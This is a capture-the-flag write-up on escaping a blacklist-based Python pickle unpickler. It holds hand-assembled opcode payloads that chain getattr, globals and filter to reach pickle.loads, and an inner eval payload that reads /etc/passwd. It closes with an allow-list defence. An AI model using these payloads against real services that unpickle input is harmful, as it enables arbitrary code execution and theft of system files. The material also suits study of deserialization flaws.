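Last week, while waiting on a model training run, I came across a CTF challenge on Python pickle deserialization. It was different from the ones I had seen before and looked interesting, so I decided to dig into it.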
0x00 Pickle Deserialization
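As is well known, when we control the input to a deserialization interface such as `pickle.loads`, we can craft a malicious payload to achieve arbitrary code execution. This works because, during unpickling, the `pickle` library by default imports any class or function object named in the payload. For that reason the Python developers have long warned against unpickling untrusted input that has not been sanitized. They also recommend implementing a custom `Unpickler` to restrict which classes or functions can be imported during unpickling; see https://docs.python.org/3.7/library/pickle.html#restricting-globals .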
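To make the mechanism concrete, here is a minimal sketch of how unpickling ends up calling a function chosen by whoever produced the bytes. The class name `Demo` is hypothetical, and `sorted` is only a harmless stand-in for something dangerous.

```python
import pickle


class Demo:
    """Hypothetical class: unpickling it calls an arbitrary callable."""

    def __reduce__(self):
        # pickle stores (callable, args). On load, the callable is imported
        # by module and name, then called with args. sorted is a harmless
        # stand-in for something like os.system.
        return (sorted, ([3, 1, 2],))


data = pickle.dumps(Demo())
result = pickle.loads(data)
print(result)  # the return value of sorted(...), not a Demo instance
```

The object that comes back is whatever the callable returned, which is why an attacker only needs control over the bytes and not over any class defined on the receiving side.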
0x01 RestrictedUnpickler
Back to the challenge. The logic of its pickle "sandbox" is roughly as follows:

    import pickle
    import io
    import builtins

    class RestrictedUnpickler(pickle.Unpickler):
        blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

        def find_class(self, module, name):
            # Only allow safe classes from builtins.
            if module == "builtins" and name not in self.blacklist:
                return getattr(builtins, name)
            # Forbid everything else.
            raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

    def restricted_loads(s):
        """Helper function analogous to pickle.loads()."""
        return RestrictedUnpickler(io.BytesIO(s)).load()
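As you can see, the challenge is adapted from the example in the Python documentation. It restricts what can be imported during unpickling by adding a blacklist that disables essentially every built-in function in `builtins` that can directly execute code, and it also requires that any imported class or function live in the `builtins` module. But if we cannot use those built-in functions, does that mean we cannot execute code?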
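The behaviour of this sandbox can be checked with a short sketch. It repeats the challenge's unpickler so that it runs on its own; the helper `try_load` is a hypothetical name added only for illustration.

```python
import builtins
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    # Same blacklist as in the challenge code.
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input',
                 '__import__', 'exit'}

    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


def try_load(data):
    """Hypothetical helper: return the object, or the rejection message."""
    try:
        return restricted_loads(data)
    except pickle.UnpicklingError as exc:
        return "rejected: %s" % exc


# Pickling a function stores only its module and name, so each pickle
# below is a single global reference that find_class has to resolve.
blocked_builtin = try_load(pickle.dumps(eval, protocol=3))
blocked_module = try_load(pickle.dumps(pickle.loads, protocol=3))
allowed = try_load(pickle.dumps(getattr, protocol=3))

print(blocked_builtin)
print(blocked_module)
print(allowed)
```

Note that `pickle.loads` cannot be referenced directly because it does not live in `builtins`, while `getattr` passes the check without complaint.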
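Skimming the list of Python built-in functions in the documentation and setting aside the disabled ones, the only candidates that look usable are `map` and `filter`, the two built-ins that accept a function as an argument.
After many attempts, I found that even though we can pass a function as an argument, we can only call the handful of functions left in builtins, which falls short of arbitrary code execution. Just as I was getting stuck, it struck me that I had overlooked something: the `pickle` module that is already imported in the surrounding context. Could we find a way to call `pickle.loads`? Since `pickle.loads` uses the default, unrestricted unpickler, that would bypass the original "sandbox" outright.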
0x02 Pickle Protocol
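Let's look at the pickle serialization protocol. The environment here is Python 3, so the relevant version is Protocol 3. Note that `pickletools.opcodes` lists the opcodes of every protocol version, not only Protocol 3:

    import pickletools
    import prettytable

    # Build a table with one row per opcode: name, code byte, first doc line.
    opcode_table = prettytable.PrettyTable()
    opcode_table.field_names = ['Name', 'Code', 'Docs']
    for opcode in pickletools.opcodes:
        opcode_table.add_row([opcode.name, opcode.code, opcode.doc.splitlines()[0]])
    print(opcode_table)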
This prints the `opcode` table:

| Name | Code | Docs |
|------|------|------|
| INT | `I` | Push an integer or bool. |
| BININT | `J` | Push a four-byte signed integer. |
| BININT1 | `K` | Push a one-byte unsigned integer. |
| BININT2 | `M` | Push a two-byte unsigned integer. |
| LONG | `L` | Push a long integer. |
| LONG1 | `\x8a` | Long integer using one-byte length. |
| LONG4 | `\x8b` | Long integer using found-byte length. |
| STRING | `S` | Push a Python string object. |
| SHORT_BINSTRING | `U` | Push a Python string object. |
| BINBYTES | `B` | Push a Python bytes object. |
| SHORT_BINBYTES | `C` | Push a Python bytes object. |
| BINBYTES8 | `\x8e` | Push a Python bytes object. |
| NONE | `N` | Push None on the stack. |
| NEWTRUE | `\x88` | Push True onto the stack. |
| NEWFALSE | `\x89` | Push False onto the stack. |
| UNICODE | `V` | Push a Python Unicode string object. |
| SHORT_BINUNICODE | `\x8c` | Push a Python Unicode string object. |
| BINUNICODE | `X` | Push a Python Unicode string object. |
| BINUNICODE8 | `\x8d` | Push a Python Unicode string object. |
| FLOAT | `F` | Newline-terminated decimal float literal. |
| BINFLOAT | `G` | Float stored in binary form, with 8 bytes of data. |
| EMPTY_LIST | `]` | Push an empty list. |
| APPEND | `a` | Append an object to a list. |
| APPENDS | `e` | Extend a list by a slice of stack objects. |
| LIST | `l` | Build a list out of the topmost stack slice, after markobject. |
| EMPTY_TUPLE | `)` | Push an empty tuple. |
| TUPLE | `t` | Build a tuple out of the topmost stack slice, after markobject. |
| TUPLE1 | `\x85` | Build a one-tuple out of the topmost item on the stack. |
| TUPLE2 | `\x86` | Build a two-tuple out of the top two items on the stack. |
| TUPLE3 | `\x87` | Build a three-tuple out of the top three items on the stack. |
| EMPTY_DICT | `}` | Push an empty dict. |
| DICT | `d` | Build a dict out of the topmost stack slice, after markobject. |
| SETITEM | `s` | Add a key+value pair to an existing dict. |
| SETITEMS | `u` | Add an arbitrary number of key+value pairs to an existing dict. |
| EMPTY_SET | `\x8f` | Push an empty set. |
| ADDITEMS | `\x90` | Add an arbitrary number of items to an existing set. |
| FROZENSET | `\x91` | Build a frozenset out of the topmost slice, after markobject. |
| POP | `0` | Discard the top stack item, shrinking the stack by one item. |
| DUP | `2` | Push the top stack item onto the stack again, duplicating it. |
| MARK | `(` | Push markobject onto the stack. |
| POP_MARK | `1` | Pop all the stack objects at and above the topmost markobject. |
| GET | `g` | Read an object from the memo and push it on the stack. |
| BINGET | `h` | Read an object from the memo and push it on the stack. |
| LONG_BINGET | `j` | Read an object from the memo and push it on the stack. |
| PUT | `p` | Store the stack top into the memo. The stack is not popped. |
| BINPUT | `q` | Store the stack top into the memo. The stack is not popped. |
| LONG_BINPUT | `r` | Store the stack top into the memo. The stack is not popped. |
| MEMOIZE | `\x94` | Store the stack top into the memo. The stack is not popped. |
| EXT1 | `\x82` | Extension code. |
| EXT2 | `\x83` | Extension code. |
| EXT4 | `\x84` | Extension code. |
| GLOBAL | `c` | Push a global object (module.attr) on the stack. |
| STACK_GLOBAL | `\x93` | Push a global object (module.attr) on the stack. |
| REDUCE | `R` | Push an object built from a callable and an argument tuple. |
| BUILD | `b` | Finish building an object, via `__setstate__` or dict update. |
| INST | `i` | Build a class instance. |
| OBJ | `o` | Build a class instance. |
| NEWOBJ | `\x81` | Build an object instance. |
| NEWOBJ_EX | `\x92` | Build an object instance. |
| PROTO | `\x80` | Protocol version indicator. |
| STOP | `.` | Stop the unpickling machine. |
| FRAME | `\x95` | Indicate the beginning of a new frame. |
| PERSID | `P` | Push an object identified by a persistent ID. |
| BINPERSID | `Q` | Push an object identified by a persistent ID. |
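With this table at hand, let's look at an example:

    import pickle
    from pickletools import dis

    class Payloads(object):
        def __reduce__(self):
            return (eval, ("print(1)", ))

    # protocol=3 keeps the bytes identical on newer Python versions,
    # whose default protocol is higher.
    payload = pickle.dumps(Payloads(), protocol=3)
    print(payload)
    dis(payload)  # dis() prints the disassembly itself and returns None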
The output is:

    b'\x80\x03cbuiltins\neval\nq\x00X\x08\x00\x00\x00print(1)q\x01\x85q\x02Rq\x03.'
        0: \x80 PROTO      3                 <= protocol version 3
        2: c    GLOBAL     'builtins eval'
       17: q    BINPUT     0
       19: X    BINUNICODE 'print(1)'        <= length = \x08\x00\x00\x00
       32: q    BINPUT     1
       34: \x85 TUPLE1
       35: q    BINPUT     2
       37: R    REDUCE                       <= builds a function call
       38: q    BINPUT     3
       40: .    STOP
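The disassembly suggests that a stream can be written by hand from just a few opcodes. The following is a minimal sketch, assuming the `BINPUT` memo writes can be left out because nothing reads them back; the target call `len('abc')` is chosen purely for illustration.

```python
import pickle
import pickletools

# Hand-written Protocol 3 stream equivalent to len('abc').
raw = b'\x80\x03'                # PROTO 3
raw += b'cbuiltins\nlen\n'       # GLOBAL: push builtins.len
raw += b'X\x03\x00\x00\x00abc'   # BINUNICODE: 4-byte little-endian length, then 'abc'
raw += b'\x85'                   # TUPLE1: wrap the top item into ('abc',)
raw += b'R'                      # REDUCE: pop callable and args, push len('abc')
raw += b'.'                      # STOP: return the top of the stack

pickletools.dis(raw)             # verify the stream is well formed
value = pickle.loads(raw)
print(value)
```

Running `pickletools.dis` on a hand-built stream before loading it is a cheap way to catch an unbalanced stack early.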
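Building on the example above, we use only the functions still available in builtins to construct a payload that calls `pickle.loads` indirectly. The opcodes use `filter`; `map` would work the same way, since either one calls the function on each item once `list` consumes it:

    list(filter(getattr(getattr(dict, 'get')(globals(), 'pickle'), 'loads'), ('PAYLOAD',)))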
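The expression is easier to follow when split into steps in plain Python. This is only a sketch of the call chain outside the unpickler, and `sample` is a harmless stand-in for the real inner payload.

```python
import pickle

# Step 1: fetch dict.get through getattr, because a pickle stream has no
# attribute-access syntax, only calls.
get = getattr(dict, 'get')

# Step 2: look up the already-imported module in the global namespace.
module = get(globals(), 'pickle')

# Step 3: fetch loads from the module object.
loads = getattr(module, 'loads')

# Step 4: filter and map are lazy, so list() is what forces the calls.
sample = pickle.dumps({'k': 'v'})          # stand-in for the inner payload
kept = list(filter(loads, (sample,)))      # items whose loads() result is truthy
mapped = list(map(loads, (sample,)))       # the loads() results themselves
```

`filter` hands back the original items rather than the return values, which does not matter for the attack because only the side effect of calling `loads` is needed.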
The hand-built `opcode` sequence is as follows (`inner_payload` is the inner payload constructed in the next snippet):

    payload = b'\x80\x03'
    payload += b'cbuiltins\nlist\nq\x00'         # list
    payload += b'cbuiltins\nfilter\nq\x01'       # filter
    payload += b'cbuiltins\ngetattr\nq\x02'      # getattr
    payload += b'cbuiltins\ngetattr\nq\x03'      # getattr
    payload += b'cbuiltins\ndict\nq\x04'         # dict
    payload += b'X\x03\x00\x00\x00getq\x05'      # 'get'
    payload += b'\x86q\x06'                      # (dict, 'get')
    payload += b'Rq\x07'                         # RUN getattr(dict, 'get')
    payload += b'cbuiltins\nglobals\nq\x08'      # globals
    payload += b')q\x09'                         # ()
    payload += b'Rq\x0a'                         # RUN globals()
    payload += b'X\x06\x00\x00\x00pickleq\x0b'   # 'pickle'
    payload += b'\x86q\x0c'                      # (globals(), 'pickle')
    payload += b'Rq\x0d'                         # RUN dict.get(globals(), 'pickle')
    payload += b'X\x05\x00\x00\x00loadsq\x0e'    # 'loads'
    payload += b'\x86q\x0f'                      # (pickle, 'loads')
    payload += b'Rq\x10'                         # RUN getattr(pickle, 'loads')
    payload += b'B'                              # BINBYTES: 4-byte length, then data
    payload += (len(inner_payload)).to_bytes(4, byteorder='little')
    payload += inner_payload
    payload += b'\x85q\x11'                      # (inner_payload,)
    payload += b'\x86q\x12'                      # (loads, (inner_payload,))
    payload += b'Rq\x13'                         # RUN filter(loads, (inner_payload,))
    payload += b'\x85q\x14'                      # TUPLE1
    payload += b'Rq\x15'                         # RUN list(...)
    payload += b'.'                              # STOP
First we construct the inner payload:

    import pickle

    class InnerPayload(object):
        def __reduce__(self):
            return (
                eval,
                ("print(open('/etc/passwd').read())",)
            )

    # protocol=3 reproduces the bytes shown below on newer Python versions.
    inner_payload = pickle.dumps(InnerPayload(), protocol=3)
    print(inner_payload)
    # b"\x80\x03cbuiltins\neval\nq\x00X!\x00\x00\x00print(open('/etc/passwd').read())q\x01\x85q\x02Rq\x03."
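Combining the two payloads and running the result through the sandbox shows that our payload executes successfully and reads `/etc/passwd`. It also shows that every function imported through `find_class` satisfies the restriction: `getattr`, `list`, `filter`, `globals`, `dict`.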
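The whole chain can be reproduced with the self-contained sketch below. It assumes CPython with the default C-accelerated unpickler, where `globals()` resolves to the module that defines `restricted_loads`. The helper `build_outer` is a hypothetical name, the `BINPUT` memo writes are omitted, and the inner payload evaluates `6 * 7` instead of reading a file.

```python
import builtins
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input',
                 '__import__', 'exit'}

    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


class InnerPayload:
    def __reduce__(self):
        # eval is blacklisted in the sandbox, so seeing its result at all
        # shows that the restriction was bypassed.
        return (eval, ("6 * 7",))


def build_outer(inner, hof=b'filter'):
    """Hypothetical helper: assemble
    list(hof(getattr(dict.get(globals(), 'pickle'), 'loads'), (inner,)))."""
    out = b'\x80\x03'                            # PROTO 3
    out += b'cbuiltins\nlist\n'                  # list
    out += b'cbuiltins\n' + hof + b'\n'          # filter or map
    out += b'cbuiltins\ngetattr\n'               # outer getattr
    out += b'cbuiltins\ngetattr\n'               # inner getattr
    out += b'cbuiltins\ndict\n'                  # dict
    out += b'X\x03\x00\x00\x00get\x86R'          # getattr(dict, 'get')
    out += b'cbuiltins\nglobals\n)R'             # globals()
    out += b'X\x06\x00\x00\x00pickle\x86R'       # dict.get(globals(), 'pickle')
    out += b'X\x05\x00\x00\x00loads\x86R'        # getattr(pickle, 'loads')
    out += b'B' + len(inner).to_bytes(4, 'little') + inner  # BINBYTES
    out += b'\x85\x86R'                          # hof(loads, (inner,))
    out += b'\x85R.'                             # list(...), then STOP
    return out


inner_payload = pickle.dumps(InnerPayload(), protocol=3)
via_filter = restricted_loads(build_outer(inner_payload, b'filter'))
via_map = restricted_loads(build_outer(inner_payload, b'map'))
print(via_filter, via_map)
```

With `map` the result of the forbidden `eval` call comes straight back, while `filter` returns the inner bytes because the `eval` result was truthy; in both cases the blacklisted function ran.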
0x03 Summary
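This is the only bypass I can think of for now. I don't know whether other approaches exist, so I will have to wait for the experts to publish their writeups. Hand-assembling the `opcode` stream is not especially hard, but one slip is enough to unbalance the stack, which happened several times while I was debugging.
This also shows that merely disabling dangerous functions is not enough to make `pickle` deserialization safe; the interface still has to be used with caution.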
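For contrast, the example in the Python documentation linked above uses an allow-list rather than a blacklist. Below is a minimal sketch along those lines; the names `AllowListUnpickler` and `allowlist_loads` are hypothetical, and an allow-list narrows the attack surface without being a guarantee of safety.

```python
import builtins
import io
import pickle

# Allow-list taken from the example in the Python documentation.
SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}


class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only names listed explicitly can be imported.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def allowlist_loads(s):
    return AllowListUnpickler(io.BytesIO(s)).load()


# Plain data and allow-listed types still load.
ok = allowlist_loads(pickle.dumps([1, 2, range(15)], protocol=3))

# getattr, the first building block of the bypass, is now rejected.
try:
    allowlist_loads(pickle.dumps(getattr, protocol=3))
    getattr_allowed = True
except pickle.UnpicklingError:
    getattr_allowed = False

print(ok, getattr_allowed)
```

Because `getattr`, `globals`, `filter` and `list` are no longer importable, the chain described in this post cannot even start under such a policy.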
0x04 References
1. https://github.com/phith0n/code-breaking/blob/master/2018/picklecode/web/core/serializer.py
2. https://docs.python.org/3.7/library/pickle.html#restricting-globals